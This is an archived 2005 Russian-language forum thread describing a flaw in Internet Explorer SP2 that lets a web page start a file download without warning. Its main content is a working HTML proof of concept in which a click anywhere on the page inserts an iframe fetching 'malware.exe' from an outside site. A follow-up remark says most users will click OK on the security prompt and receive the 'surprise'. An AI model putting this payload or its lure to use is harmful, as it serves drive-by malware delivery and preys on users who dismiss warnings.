PDA

Просмотр полной версии : Загрузка файлов без предупреждения в IE



Andrey
15.01.2005, 11:01
IE (SP2) не проверяет тег body с событием onclick, который динамически создает iframe. Таким образом появляется возможность создать страницу, при клике на которой автоматически начнется загрузка файла.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com>
<META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META http-equiv=Content-Language content=en-us>
<META content=True name=HandheldFriendly>
<META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>


<embed>
<body onclick=&#039;a=document.createElement("\<iframe src=\"http:\/\/theinsider.deep-ice.com\/malware.exe\"\>\<\/iframe\>"); document.body.appendChild(a); setTimeout("document.execCommand\(\"refresh\")",1000)&#039;>
<cebter>





Click AnyWhere You Want</center>
</BODY></HTML>

Источник: http://www.xakep.ru/post/25215/default.asp

Geser
15.01.2005, 11:05
Но при попытке его запустить SP2 видимо попросит разрешения, так что нужно смотреть что спрашивают.

Andrey
15.01.2005, 11:12
Но большинство людей (процентов 80) предпочтут нажать кнопку "OK" (чтобы "глупый IE" отстал от них) и пожалуйста получите "сюрприз".